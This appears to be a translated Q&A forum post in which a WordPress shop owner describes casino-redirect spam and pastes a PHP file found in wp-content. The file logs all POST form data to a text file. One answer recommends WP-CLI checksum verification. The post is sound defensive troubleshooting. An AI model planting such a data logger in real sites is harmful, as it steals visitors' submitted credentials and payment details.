我遭遇黑客攻击
我的网站不是托管在服务器上,而是托管在共享主机上,如果服务器被黑客入侵,我什么也做不了。我的问题不是如何保护服务器,而是下面的代码是否是唯一应该删除的文件,下面的文件是否允许黑客入侵?该代码可以对我的网站进行多大程度的更改。我的服务器没有被黑客入侵,但有一个被黑客入侵的 wordpress 网站,请不要将其标记为重复。如果可能的话,我想保护 wordpress
发生的事情是,创建了以我的域名为父级的链接,例如 www.example.com/bellagio,并重定向到赌场网站。我没有名为 bellagio 的文件或文件夹,我当然不想显示赌场页面。
以前很难猜测,所以我删除了 wordpress 网站中的每个文件,我通过托管面板重新加载了帐户,我打算再次执行此操作,但后来我发现了这个名为“webftf67rty6t7fi7r6a.txt”的文件,我很确定我没有创建它。
文件中的代码看起来像是 php 代码,它是
<?php
$filename = "webftf67rty6t7fi7r6a.txt";
foreach($_POST as $key => $value)
{
file_put_contents($filename, "$key: $value\n", FILE_APPEND);
}
file_put_contents($filename, "----------\n", FILE_APPEND);
?>
我还应该寻找什么,删除此文件是否会删除阻止程序的访问权限?我应该检查所有文件夹是否有相同的文件名/不同的文件名吗?是因为我使用 godaddy 吗?
这是用于入侵我网站的代码吗?它位于 wp-contents 文件夹中,那么如何防止这种情况再次发生?
我经营一家电子商务商店,因此它需要运行,并且能详细说明一下这个黑客最多能做什么吗?
谢谢您花时间回答我的问题,我对这些事情还不太熟悉 :(
答案1
您应该下载并安装 -WordPress 的命令行界面 | WP-CLI
[alexus@j ~/alexus.org/wordpress]$ wp --version
WP-CLI 0.18.0
[alexus@j ~/alexus.org/wordpress]$ wp core verify-checksums
Success: WordPress install verifies against checksums.
[alexus@j ~/alexus.org/wordpress]$